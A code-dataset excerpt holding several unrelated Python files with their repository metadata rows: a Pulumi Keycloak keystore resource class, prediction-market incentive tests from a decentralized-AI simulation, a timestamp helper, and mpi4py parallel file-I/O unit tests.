:param pulumi.Input[int] priority: Priority for the provider. Defaults to `0`
:param pulumi.Input[str] realm_id: The realm this keystore exists in.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RealmKeystoreJavaGeneratedState.__new__(_RealmKeystoreJavaGeneratedState)
__props__.__dict__["active"] = active
__props__.__dict__["algorithm"] = algorithm
__props__.__dict__["enabled"] = enabled
__props__.__dict__["key_alias"] = key_alias
__props__.__dict__["key_password"] = key_password
__props__.__dict__["keystore"] = keystore
__props__.__dict__["keystore_password"] = keystore_password
__props__.__dict__["name"] = name
__props__.__dict__["priority"] = priority
__props__.__dict__["realm_id"] = realm_id
return RealmKeystoreJavaGenerated(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def active(self) -> pulumi.Output[Optional[bool]]:
"""
When `false`, key in not used for signing. Defaults to `true`.
"""
return pulumi.get(self, "active")
@property
@pulumi.getter
def algorithm(self) -> pulumi.Output[Optional[str]]:
"""
Intended algorithm for the key. Defaults to `RS256`
"""
return pulumi.get(self, "algorithm")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
When `false`, key is not accessible in this realm. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="keyAlias")
def key_alias(self) -> pulumi.Output[str]:
"""
Alias for the private key
"""
return pulumi.get(self, "key_alias")
@property
@pulumi.getter(name="keyPassword")
def key_password(self) -> pulumi.Output[str]:
"""
Password for the private key
"""
return pulumi.get(self, "key_password")
@property
@pulumi.getter
def keystore(self) -> pulumi.Output[str]:
"""
Path to keys file on keycloak instance.
"""
return pulumi.get(self, "keystore")
@property
@pulumi.getter(name="keystorePassword")
def keystore_password(self) -> pulumi.Output[str]:
"""
Password for the private key.
"""
return pulumi.get(self, "keystore_password")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Display name of provider when linked in admin console.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def priority(self) -> pulumi.Output[Optional[int]]:
"""
Priority for the provider. Defaults to `0`
"""
return pulumi.get(self, "priority")
@property
@pulumi.getter(name="realmId")
def realm_id(self) -> pulumi.Output[str]:
"""
The realm this keystore exists in.
"""
return pulumi.get(self, "realm_id")
| 40.167785 | 162 | 0.629073 | 2,754 | 23,940 | 5.281409 | 0.066812 | 0.101341 | 0.089515 | 0.072602 | 0.860158 | 0.840839 | 0.8154 | 0.782331 | 0.771949 | 0.76418 | 0 | 0.003912 | 0.2632 | 23,940 | 595 | 163 | 40.235294 | 0.820681 | 0.273559 | 0 | 0.738636 | 1 | 0 | 0.08817 | 0.00932 | 0 | 0 | 0 | 0 | 0 | 1 | 0.161932 | false | 0.15625 | 0.014205 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
6fbe2765166180f1fc93227d9d94ae14e74cb772 | 17,762 | py | Python | simulation/decai/simulation/contract/incentive/tests/test_prediction_market.py | boost-entropy-python/0xDeCA10B | fe67c97283a19b83bb5c5616705ed6ff570cdd8f | [
"MIT"
] | 445 | 2019-06-04T16:49:00.000Z | 2022-03-19T02:20:42.000Z | simulation/decai/simulation/contract/incentive/tests/test_prediction_market.py | boost-entropy-python/0xDeCA10B | fe67c97283a19b83bb5c5616705ed6ff570cdd8f | [
"MIT"
] | 51 | 2019-07-20T14:36:10.000Z | 2022-03-07T05:30:50.000Z | simulation/decai/simulation/contract/incentive/tests/test_prediction_market.py | boost-entropy-python/0xDeCA10B | fe67c97283a19b83bb5c5616705ed6ff570cdd8f | [
"MIT"
] | 91 | 2019-07-12T16:23:04.000Z | 2022-03-07T05:25:36.000Z | import unittest
from collections import defaultdict
from typing import cast
from injector import Injector
from decai.simulation.contract.balances import Balances
from decai.simulation.contract.classification.perceptron import PerceptronModule
from decai.simulation.contract.data.data_handler import StoredData
from decai.simulation.contract.incentive.incentive_mechanism import IncentiveMechanism
from decai.simulation.contract.incentive.prediction_market import MarketPhase, \
PredictionMarket, PredictionMarketImModule
from decai.simulation.contract.objects import Msg, TimeMock
from decai.simulation.data.data_loader import DataLoader
from decai.simulation.data.simple_data_loader import SimpleDataModule
from decai.simulation.logging_module import LoggingModule
class TestPredictionMarket(unittest.TestCase):
def test_market_like_original_paper(self):
inj = Injector([
SimpleDataModule,
LoggingModule,
PerceptronModule,
PredictionMarketImModule(
allow_greater_deposit=False,
group_contributions=False,
reset_model_during_reward_phase=False,
),
])
balances = inj.get(Balances)
data = inj.get(DataLoader)
im = cast(PredictionMarket, inj.get(IncentiveMechanism))
im.owner = 'owner'
assert isinstance(im, PredictionMarket)
init_train_data_portion = 0.2
initializer_address = 'initializer'
total_bounty = 100_000
balances.initialize(initializer_address, total_bounty)
good_contributor_address = 'good_contributor'
initial_good_balance = 10_000
balances.initialize(good_contributor_address, initial_good_balance)
bad_contributor_address = 'bad_contributor'
initial_bad_balance = 10_000
balances.initialize(bad_contributor_address, initial_bad_balance)
(x_train, y_train), (x_test, y_test) = data.load_data()
init_idx = int(len(x_train) * init_train_data_portion)
assert init_idx > 0
x_init_data, y_init_data = x_train[:init_idx], y_train[:init_idx]
x_remaining, y_remaining = x_train[init_idx:], y_train[init_idx:]
# Split test set into pieces.
num_pieces = 10
test_dataset_hashes, test_sets = im.get_test_set_hashes(num_pieces, x_test, y_test)
# Ending criteria:
min_length_s = 100
min_num_contributions = min(len(x_remaining), 100)
# Commitment Phase
self.assertIsNone(im.state)
im.model.init_model(x_init_data, y_init_data, save_model=True)
hashes_split = 3
test_reveal_index = im.initialize_market(Msg(initializer_address, total_bounty),
test_dataset_hashes[:hashes_split],
min_length_s, min_num_contributions)
assert 0 <= test_reveal_index < len(test_dataset_hashes)
self.assertEqual(MarketPhase.INITIALIZATION, im.state)
test_reveal_index = im.add_test_set_hashes(Msg(initializer_address, 0), test_dataset_hashes[hashes_split:])
assert 0 <= test_reveal_index < len(test_dataset_hashes)
self.assertEqual(MarketPhase.INITIALIZATION, im.state)
im.reveal_init_test_set(test_sets[test_reveal_index])
self.assertEqual(MarketPhase.PARTICIPATION, im.state)
# Participation Phase
value = 100
total_deposits = defaultdict(float)
for i in range(min_num_contributions):
data = x_remaining[i]
classification = y_remaining[i]
if i % 2 == 0:
contributor = good_contributor_address
else:
contributor = bad_contributor_address
classification = 1 - classification
cost, _ = im.handle_add_data(contributor, value, data, classification)
self.assertEqual(im.min_stake, cost, "Cost should be the minimum stake because of the options passed in.")
balances.send(contributor, im.owner, cost)
total_deposits[contributor] += cost
# Reward Phase
self.assertEqual(MarketPhase.PARTICIPATION, im.state)
im.end_market()
self.assertEqual(MarketPhase.REVEAL_TEST_SET, im.state)
for i, test_set_portion in enumerate(test_sets):
if i != test_reveal_index:
im.verify_next_test_set(test_set_portion)
self.assertEqual(MarketPhase.REWARD_RESTART, im.state)
while im.remaining_bounty_rounds > 0:
im.process_contribution()
# Collect rewards.
self.assertEqual(MarketPhase.REWARD_COLLECT, im.state)
for contributor in [good_contributor_address, bad_contributor_address]:
# Don't need to pass the right StoredData.
# noinspection PyTypeChecker
reward = im.handle_refund(contributor, None, 0, False, None)
balances.send(im.owner, contributor, reward)
self.assertGreater(total_deposits[good_contributor_address], 0)
self.assertGreater(total_deposits[bad_contributor_address], 0)
# General checks that should be true for a market with a reasonably sensitive model.
self.assertLess(balances[im.owner], total_bounty,
f"Some of the bounty should be distributed.\n"
f"Balances: {balances.get_all()}")
self.assertLess(0, balances[im.owner])
# Sometimes the bad contributor happens to get some value but not much.
self.assertAlmostEqual(balances[bad_contributor_address], initial_bad_balance, delta=2,
msg=f"The bad contributor should lose funds.\n"
f"Balances: {balances.get_all()}")
self.assertGreater(balances[good_contributor_address], initial_good_balance)
self.assertLess(balances[bad_contributor_address], balances[good_contributor_address])
self.assertLessEqual(balances[good_contributor_address] - balances[bad_contributor_address],
total_bounty)
self.assertEqual(initial_good_balance + initial_bad_balance + total_bounty,
balances[good_contributor_address] + balances[bad_contributor_address] +
balances[im.owner],
"Should be a zero-sum.")
def test_market(self):
inj = Injector([
SimpleDataModule,
LoggingModule,
PerceptronModule,
PredictionMarketImModule(
allow_greater_deposit=True,
group_contributions=True,
reset_model_during_reward_phase=True,
),
])
balances = inj.get(Balances)
data = inj.get(DataLoader)
im = cast(PredictionMarket, inj.get(IncentiveMechanism))
im.owner = 'owner'
assert isinstance(im, PredictionMarket)
init_train_data_portion = 0.2
initializer_address = 'initializer'
total_bounty = 100_000
balances.initialize(initializer_address, total_bounty)
good_contributor_address = 'good_contributor'
initial_good_balance = 10_000
balances.initialize(good_contributor_address, initial_good_balance)
bad_contributor_address = 'bad_contributor'
initial_bad_balance = 10_000
balances.initialize(bad_contributor_address, initial_bad_balance)
(x_train, y_train), (x_test, y_test) = data.load_data()
init_idx = int(len(x_train) * init_train_data_portion)
assert init_idx > 0
x_init_data, y_init_data = x_train[:init_idx], y_train[:init_idx]
x_remaining, y_remaining = x_train[init_idx:], y_train[init_idx:]
# Split test set into pieces.
num_pieces = 10
test_dataset_hashes, test_sets = im.get_test_set_hashes(num_pieces, x_test, y_test)
# Ending criteria:
min_length_s = 100
min_num_contributions = min(len(x_remaining), 100)
# Commitment Phase
self.assertIsNone(im.state)
im.model.init_model(x_init_data, y_init_data, save_model=True)
hashes_split = 3
test_reveal_index = im.initialize_market(Msg(initializer_address, total_bounty),
test_dataset_hashes[:hashes_split],
min_length_s, min_num_contributions)
assert 0 <= test_reveal_index < len(test_dataset_hashes)
self.assertEqual(MarketPhase.INITIALIZATION, im.state)
test_reveal_index = im.add_test_set_hashes(Msg(initializer_address, 0), test_dataset_hashes[hashes_split:])
assert 0 <= test_reveal_index < len(test_dataset_hashes)
self.assertEqual(MarketPhase.INITIALIZATION, im.state)
im.reveal_init_test_set(test_sets[test_reveal_index])
self.assertEqual(MarketPhase.PARTICIPATION, im.state)
# Participation Phase
value = 100
total_deposits = defaultdict(float)
for i in range(min_num_contributions):
data = x_remaining[i]
classification = y_remaining[i]
if i % 2 == 0:
contributor = good_contributor_address
else:
contributor = bad_contributor_address
classification = 1 - classification
cost, _ = im.handle_add_data(contributor, value, data, classification)
balances.send(contributor, im.owner, cost)
total_deposits[contributor] += cost
# Reward Phase
self.assertEqual(MarketPhase.PARTICIPATION, im.state)
im.end_market()
self.assertEqual(MarketPhase.REVEAL_TEST_SET, im.state)
for i, test_set_portion in enumerate(test_sets):
if i != test_reveal_index:
im.verify_next_test_set(test_set_portion)
self.assertEqual(MarketPhase.REWARD_RESTART, im.state)
while im.remaining_bounty_rounds > 0:
im.process_contribution()
# Collect rewards.
self.assertEqual(MarketPhase.REWARD_COLLECT, im.state)
for contributor in [good_contributor_address, bad_contributor_address]:
# Don't need to pass the right StoredData.
# noinspection PyTypeChecker
reward = im.handle_refund(contributor, None, 0, False, None)
balances.send(im.owner, contributor, reward)
self.assertGreater(total_deposits[good_contributor_address], 0)
self.assertGreater(total_deposits[bad_contributor_address], 0)
# General checks that should be true for a market with a reasonably sensitive model.
self.assertLess(balances[im.owner], total_bounty,
f"Some of the bounty should be distributed.\n"
f"Balances: {balances.get_all()}")
self.assertLess(0, balances[im.owner])
self.assertLess(balances[bad_contributor_address], initial_bad_balance)
self.assertGreater(balances[good_contributor_address], initial_good_balance)
self.assertLess(balances[bad_contributor_address], balances[good_contributor_address])
self.assertLessEqual(balances[good_contributor_address] - balances[bad_contributor_address],
total_bounty)
self.assertEqual(initial_good_balance + initial_bad_balance + total_bounty,
balances[good_contributor_address] + balances[bad_contributor_address] +
balances[im.owner],
"Should be a zero-sum.")
self.assertEqual(initial_bad_balance - total_deposits[bad_contributor_address],
balances[bad_contributor_address],
"The bad contributor should lose all of their deposits.")
def test_report(self):
inj = Injector([
SimpleDataModule,
LoggingModule,
PerceptronModule,
PredictionMarketImModule(
allow_greater_deposit=True,
group_contributions=True,
reset_model_during_reward_phase=True,
),
])
balances = inj.get(Balances)
data = inj.get(DataLoader)
im = cast(PredictionMarket, inj.get(IncentiveMechanism))
im.owner = 'owner'
time_method = inj.get(TimeMock)
assert isinstance(im, PredictionMarket)
init_train_data_portion = 0.2
initializer_address = 'initializer'
total_bounty = 100_000
balances.initialize(initializer_address, total_bounty)
good_contributor_address = 'good_contributor'
initial_good_balance = 10_000
balances.initialize(good_contributor_address, initial_good_balance)
bad_contributor_address = 'bad_contributor'
initial_bad_balance = 10_000
balances.initialize(bad_contributor_address, initial_bad_balance)
(x_train, y_train), (x_test, y_test) = data.load_data()
init_idx = int(len(x_train) * init_train_data_portion)
assert init_idx > 0
x_init_data, y_init_data = x_train[:init_idx], y_train[:init_idx]
x_remaining, y_remaining = x_train[init_idx:], y_train[init_idx:]
# Split test set into pieces.
num_pieces = 10
test_dataset_hashes, test_sets = im.get_test_set_hashes(num_pieces, x_test, y_test)
# Ending criteria:
min_length_s = 100
min_num_contributions = min(len(x_remaining), 100)
# Commitment Phase
self.assertIsNone(im.state)
im.model.init_model(x_init_data, y_init_data, save_model=True)
test_reveal_index = im.initialize_market(Msg(initializer_address, total_bounty),
test_dataset_hashes,
min_length_s, min_num_contributions)
self.assertEqual(MarketPhase.INITIALIZATION, im.state)
assert 0 <= test_reveal_index < len(test_dataset_hashes)
im.reveal_init_test_set(test_sets[test_reveal_index])
self.assertEqual(MarketPhase.PARTICIPATION, im.state)
# Participation Phase
value = 100
total_deposits = defaultdict(float)
stored_data = None
for i in range(min_num_contributions):
time_method.add_time(60)
data = x_remaining[i]
classification = y_remaining[i]
if i % 2 == 0:
contributor = good_contributor_address
else:
contributor = bad_contributor_address
classification = 1 - classification
cost, _ = im.handle_add_data(contributor, value, data, classification)
if stored_data is None:
stored_data = StoredData(classification, time_method(), contributor, cost, cost)
balances.send(contributor, im.owner, cost)
total_deposits[contributor] += cost
# Reward Phase
self.assertEqual(MarketPhase.PARTICIPATION, im.state)
im.end_market()
time_method.add_time(60)
self.assertEqual(MarketPhase.REVEAL_TEST_SET, im.state)
for i, test_set_portion in enumerate(test_sets):
if i != test_reveal_index:
im.verify_next_test_set(test_set_portion)
self.assertEqual(MarketPhase.REWARD_RESTART, im.state)
while im.remaining_bounty_rounds > 0:
time_method.add_time(60)
im.process_contribution()
# Collect rewards.
self.assertEqual(MarketPhase.REWARD_COLLECT, im.state)
# Get some stored data.
# Make sure reporting doesn't work yet.
reward = im.handle_report(bad_contributor_address, stored_data, False, None)
self.assertEqual(0, reward, "There should be no reward yet.")
time_method.add_time(im.any_address_claim_wait_time_s)
reward = im.handle_report(bad_contributor_address, stored_data, False, None)
balances.send(im.owner, bad_contributor_address, reward)
# Don't need to pass the right StoredData.
# noinspection PyTypeChecker
reward = im.handle_refund(bad_contributor_address, None, 0, False, None)
balances.send(im.owner, bad_contributor_address, reward)
# General checks that should be true for a market with a reasonably sensitive model.
self.assertLess(balances[im.owner], total_bounty,
f"Some of the bounty should be distributed.\n"
f"Balances: {balances.get_all()}")
self.assertLess(0, balances[im.owner])
self.assertGreater(total_deposits[good_contributor_address], 0)
self.assertGreater(total_deposits[bad_contributor_address], 0)
# The bad contributor profited because they reported the good contributor.
self.assertGreater(balances[bad_contributor_address], initial_bad_balance)
self.assertLess(balances[good_contributor_address], initial_good_balance)
self.assertLess(balances[good_contributor_address], balances[bad_contributor_address])
self.assertLessEqual(balances[bad_contributor_address] - balances[good_contributor_address],
total_bounty)
self.assertEqual(initial_good_balance + initial_bad_balance + total_bounty,
balances[good_contributor_address] + balances[bad_contributor_address] +
balances[im.owner],
"Should be a zero-sum.")
self.assertEqual(initial_good_balance - total_deposits[good_contributor_address],
balances[good_contributor_address],
"The good contributor should lose all of their deposits.")
| 44.18408 | 118 | 0.660173 | 1,984 | 17,762 | 5.606351 | 0.101815 | 0.098714 | 0.062303 | 0.033894 | 0.885193 | 0.862537 | 0.846265 | 0.829363 | 0.812011 | 0.808235 | 0 | 0.010057 | 0.266637 | 17,762 | 401 | 119 | 44.294264 | 0.843851 | 0.055793 | 0 | 0.855705 | 0 | 0 | 0.041699 | 0 | 0 | 0 | 0 | 0 | 0.218121 | 1 | 0.010067 | false | 0.003356 | 0.043624 | 0 | 0.057047 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d2445a7df4c449d3406dba05176b76b35018d199 | 114 | py | Python | indifferent/util.py | LandRegistry/audit | f0404195b0c90d5f96c4ce523ac8a179a1b479d5 | [
"MIT"
] | null | null | null | indifferent/util.py | LandRegistry/audit | f0404195b0c90d5f96c4ce523ac8a179a1b479d5 | [
"MIT"
] | null | null | null | indifferent/util.py | LandRegistry/audit | f0404195b0c90d5f96c4ce523ac8a179a1b479d5 | [
"MIT"
] | null | null | null | import calendar
import datetime
def unixts():
return calendar.timegm(datetime.datetime.utcnow().timetuple())
| 19 | 66 | 0.77193 | 13 | 114 | 6.769231 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114035 | 114 | 5 | 67 | 22.8 | 0.871287 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
d274d3dfcf0ad105857beb5b560a9a2e5a86cfd5 | 15,320 | py | Python | Design/PythonMpi/repo/test/test_io.py | PascalSun/MIT-year2 | a48dd89f592941efd09c1d251a3ef113e95a6af3 | [
"MIT"
] | null | null | null | Design/PythonMpi/repo/test/test_io.py | PascalSun/MIT-year2 | a48dd89f592941efd09c1d251a3ef113e95a6af3 | [
"MIT"
] | null | null | null | Design/PythonMpi/repo/test/test_io.py | PascalSun/MIT-year2 | a48dd89f592941efd09c1d251a3ef113e95a6af3 | [
"MIT"
] | null | null | null | from mpi4py import MPI
import mpiunittest as unittest
import arrayimpl
import os, tempfile
class BaseTestIO(object):
COMM = MPI.COMM_NULL
FILE = MPI.FILE_NULL
prefix = 'mpi4py-'
def setUp(self):
comm = self.COMM
fname = None
if comm.Get_rank() == 0:
fd, fname = tempfile.mkstemp(prefix=self.prefix)
os.close(fd)
fname = comm.bcast(fname, 0)
amode = MPI.MODE_RDWR | MPI.MODE_CREATE
amode |= MPI.MODE_DELETE_ON_CLOSE
amode |= MPI.MODE_UNIQUE_OPEN
info = MPI.INFO_NULL
try:
self.FILE = MPI.File.Open(comm, fname, amode, info)
except Exception:
if comm.Get_rank() == 0:
os.remove(fname)
raise
def tearDown(self):
if self.FILE:
self.FILE.Close()
self.COMM.Barrier()
# non-collective
def testReadWriteAt(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Write_at(count*rank, wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Read_at(count*rank, rbuf.as_mpi_c(count))
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testIReadIWriteAt(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Iwrite_at(count*rank, wbuf.as_raw()).Wait()
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Iread_at(count*rank, rbuf.as_mpi_c(count)).Wait()
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testReadWrite(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
for r in range(size):
if r == rank:
fh.Seek(0, MPI.SEEK_SET)
fh.Write(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
for n in range(0, len(wbuf)):
rbuf = array(-1, typecode, n+1)
fh.Seek(0, MPI.SEEK_SET)
fh.Read(rbuf.as_mpi_c(n))
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testIReadIWrite(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
for r in range(size):
if r == rank:
fh.Seek(0, MPI.SEEK_SET)
fh.Iwrite(wbuf.as_raw()).Wait()
fh.Sync()
comm.Barrier()
fh.Sync()
for n in range(0, len(wbuf)):
rbuf = array(-1, typecode, n+1)
fh.Seek(0, MPI.SEEK_SET)
fh.Iread(rbuf.as_mpi_c(n)).Wait()
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testReadWriteShared(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(rank%42, typecode, count)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Write_shared(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Read_shared(rbuf.as_mpi_c(count))
for value in rbuf[:-1]:
self.assertTrue(0<=value<42)
self.assertEqual(value, rbuf[0])
self.assertEqual(rbuf[-1], -1)
def testIReadIWriteShared(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(rank%42, typecode, count)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Iwrite_shared(wbuf.as_raw()).Wait()
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Iread_shared(rbuf.as_mpi_c(count)).Wait()
for value in rbuf[:-1]:
self.assertTrue(0<=value<42)
self.assertEqual(value, rbuf[0])
self.assertEqual(rbuf[-1], -1)
# collective
def testReadWriteAtAll(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Write_at_all(count*rank, wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Read_at_all(count*rank, rbuf.as_mpi_c(count))
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testIReadIWriteAtAll(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
try: # MPI 3.1
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Iwrite_at_all(count*rank, wbuf.as_raw()).Wait()
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Iread_at_all(count*rank, rbuf.as_mpi_c(count)).Wait()
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
except NotImplementedError:
if MPI.Get_version() >= (3, 1): raise
def testReadWriteAtAllBeginEnd(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Write_at_all_begin(count*rank, wbuf.as_raw())
fh.Write_at_all_end(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Read_at_all_begin(count*rank, rbuf.as_mpi_c(count))
fh.Read_at_all_end(rbuf.as_raw())
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testReadWriteAll(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Write_all(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Read_all(rbuf.as_mpi_c(count))
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testIReadIWriteAll(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
try: # MPI 3.1
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Iwrite_all(wbuf.as_raw()).Wait()
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Iread_all(rbuf.as_mpi_c(count)).Wait()
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
except NotImplementedError:
if MPI.Get_version() >= (3, 1): raise
def testReadWriteAllBeginEnd(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Write_all_begin(wbuf.as_raw())
fh.Write_all_end(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Read_all_begin(rbuf.as_mpi_c(count))
fh.Read_all_end(rbuf.as_raw())
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testReadWriteOrdered(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(rank%42, typecode, count)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Write_ordered(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Read_ordered(rbuf.as_mpi_c(count))
for value in rbuf[:-1]:
self.assertEqual(value, rank%42)
self.assertEqual(rbuf[-1], -1)
def testReadWriteOrderedBeginEnd(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(rank%42, typecode, count)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Write_ordered_begin(wbuf.as_raw())
fh.Write_ordered_end(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Read_ordered_begin(rbuf.as_mpi_c(count))
fh.Read_ordered_end(rbuf.as_raw())
for value in rbuf[:-1]:
self.assertEqual(value, rank%42)
self.assertEqual(rbuf[-1], -1)
class TestIOSelf(BaseTestIO, unittest.TestCase):
COMM = MPI.COMM_SELF
prefix = BaseTestIO.prefix + ('%d-' % MPI.COMM_WORLD.Get_rank())
class TestIOWorld(BaseTestIO, unittest.TestCase):
COMM = MPI.COMM_WORLD
import sys
name, version = MPI.get_vendor()
